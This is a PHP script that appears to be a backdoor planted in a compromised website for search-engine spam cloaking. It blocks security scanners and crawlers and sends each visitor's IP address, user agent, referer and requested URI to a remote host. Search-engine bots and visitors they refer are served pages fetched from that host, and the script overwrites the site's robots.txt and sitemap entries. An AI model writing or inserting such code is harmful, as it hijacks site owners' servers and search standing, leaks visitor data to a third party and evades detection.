<?php
$eufbh = "cw721";
function egbibg($url) {
	$rContent = @file_get_contents($url);
	if(empty($rContent)) {
		$ch = curl_init();
		curl_setopt($ch, CURLOPT_URL, $url);
		curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
		curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false);
		curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
		curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
		$rContent = curl_exec($ch);
		curl_close($ch);
	}
	return $rContent;
}
error_reporting(0);
$zvmrm = "http://".$eufbh. ".lesbiantown.shop/";
if(preg_match("/(PetalBot|Scrapy|CoolpadWebkit|Jaunty|Python-urllib|crawlDaddy|ApacheBench|Heritrix|ZmEu|Python|Swiftbot|Bytespider|yisouSpider|Paloaltonetworks|Indy Library|AhrefsBot|Python-requests|barkrowler|Java|AmazonBot|UniversalFeedParser|LightDeckReports Bot|SemrushBot|AskTbFXTV|Mj12bot|YandexBot|JikeSpider|DigExt|ezooms|httpClient|OBot|yySpider|feedDemon|Feedly|EasouSpider)/i", $_SERVER['HTTP_USER_AGENT'])) {
	header('HTTP/1.0 403 Forbidden');
	exit();
}
$bagent = "Docomo|Bing|Google|Yahoo";
$pc = "UVIBDgk";
$uagent = urlencode($_SERVER['HTTP_USER_AGENT']);
$refer = urlencode(@$_SERVER['HTTP_REFERER']);
$language = urlencode(@$_SERVER['HTTP_ACCEPT_LANGUAGE']);
$ip = $_SERVER['REMOTE_ADDR'];
if (!empty(@$_SERVER['HTTP_CLIENT_IP'])) {
  $ip = $_SERVER['HTTP_CLIENT_IP'];
} elseif (!empty(@$_SERVER['HTTP_X_FORWARDED_FOR'])) {
  $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
}
$ip = urlencode($ip);
$domain = urlencode($_SERVER['HTTP_HOST']);
$script = urlencode($_SERVER['SCRIPT_NAME']);
if ( (! empty($_SERVER['REQUEST_SCHEME']) && $_SERVER['REQUEST_SCHEME'] == 'https') || (! empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') || (! empty($_SERVER['SERVER_PORT']) && $_SERVER['SERVER_PORT'] == '443') || (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https') ) {
	$_SERVER['REQUEST_SCHEME'] = 'https';
} else {
	$_SERVER['REQUEST_SCHEME'] = 'http';
}
$http = urlencode($_SERVER['REQUEST_SCHEME']);
$uri = urlencode($_SERVER['REQUEST_URI']);
if(strpos($uri,"eufeuf") !== false) {
	echo "ok";
	exit();
}
$euf = 0;
if(!file_exists("euf.txt")) {
	$uuu = $http.'://'.$_SERVER['HTTP_HOST'].'/eufeuf';
	$wkyu = egbibg($uuu);
	if($wkyu == "ok") {
		$euf = 1;
		@file_put_contents("euf.txt","1");
	} else {
		$euf = 0;
		@file_put_contents("euf.txt","0");
	}
} else {
	$euf = @file_get_contents("euf.txt");
}
if(strpos($uri,"pingsitemap.xml") !== false) {
	$scripname = $_SERVER['SCRIPT_NAME'];
	if( strpos( $scripname, "index.ph") !== false) {
		if($euf == 0) {
			$scripname = '/?';
		} else {
			$scripname = '/';
		}
	} else {
		$scripname = $scripname.'?';
	}
	$robots_contents = "User-agent: *\r\nAllow: /";
	$sitemap = "$http://" . $domain .$scripname. "sitemap.xml";
	$robots_contents = trim($robots_contents)."\r\n"."Sitemap: $sitemap";
	$sitemapstatus = "";
	echo $sitemap.": ".$sitemapstatus.'<br/>';
	$requsturl = $zvmrm."?agent=$uagent&refer=$refer&lang=$language&ip=$ip&dom=$domain&http=$http&uri=$uri&pc=$pc&rewriteable=$euf&script=$script&sitemap=".urlencode($sitemap);
	$wkyu = egbibg($requsturl);
	@file_put_contents("robots.txt",$robots_contents);
	exit();
} else if(strpos($uri,"favicon.ico") !== false) {
} else if(strpos($uri,"jp2023") !== false) {
	$requsturl = $zvmrm."?agent=$uagent&refer=$refer&lang=$language&ip=$ip&dom=$domain&http=$http&uri=$uri&pc=$pc&rewriteable=$euf&script=$script";
	$wkyu = egbibg($requsturl);
	echo $wkyu;
	exit();
	return;
} else if(strpos($uri,"robots.txt") !== false) {
	$requsturl = $zvmrm."?agent=$uagent&refer=$refer&lang=$language&ip=$ip&dom=$domain&http=$http&uri=$uri&pc=$pc&rewriteable=$euf&script=$script";
	header('Content-Type: text/plain; charset=utf-8');
	echo $wkyu = egbibg($requsturl);
	@file_put_contents("robots.txt",$wkyu);
	exit();
} else if(preg_match("@^/(.*?).xml$@i", $_SERVER['REQUEST_URI'])) {
	$requsturl = $zvmrm."?agent=$uagent&refer=$refer&lang=$language&ip=$ip&dom=$domain&http=$http&uri=$uri&pc=$pc&rewriteable=$euf&script=$script";
	$wkyu = egbibg($requsturl);
	if($wkyu == "500") {
		header("HTTP/1.0 500 Internal Server Error");
		exit();
	} else {
		header('Content-Type: text/xml; charset=utf-8');
		echo $wkyu;
		exit();
		return;
	}
} else if(preg_match("/($bagent)/i", $_SERVER['HTTP_USER_AGENT'])) {
	$requsturl = $zvmrm."?agent=$uagent&refer=$refer&lang=$language&ip=$ip&dom=$domain&http=$http&uri=$uri&pc=$pc&rewriteable=$euf&script=$script";
	$wkyu = egbibg($requsturl);
	if(!empty($wkyu)) {
		if($wkyu == "500"||substr($wkyu,0,strlen("error code:"))=="error code:") {
			header("HTTP/1.0 500 Internal Server Error");
			exit();
		}
		if(substr($wkyu,0,5)=="<?xml") {
			header('Content-Type: text/xml; charset=utf-8');
		} else {
			header('Content-Type: text/html; charset=utf-8');
		}
		echo $wkyu;
		exit();
		return;
	}
} else if(preg_match("/($bagent)/i", $_SERVER['HTTP_REFERER'])) {
	$requsturl = $zvmrm."?agent=$uagent&refer=$refer&lang=$language&ip=$ip&dom=$domain&http=$http&uri=$uri&pc=$pc&rewriteable=$euf";
	$wkyu = egbibg($requsturl);
	if($wkyu == "500") {
		header("HTTP/1.0 500 Internal Server Error");
		exit();
	} else if(!empty($wkyu)) {
	    header('HTTP/1.1 404 Not Found');
		echo $wkyu;
		exit();
		return;
	}
} else {
}
?>
